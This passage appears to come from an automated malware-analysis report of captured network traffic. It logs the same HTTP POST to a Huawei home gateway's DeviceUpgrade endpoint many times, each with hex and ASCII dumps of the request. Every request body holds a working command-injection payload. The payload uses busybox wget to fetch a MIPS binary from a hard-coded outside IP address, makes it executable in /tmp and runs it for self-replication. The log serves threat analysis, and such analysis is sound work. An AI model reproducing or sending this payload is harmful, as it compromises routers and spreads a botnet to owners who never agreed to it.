74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 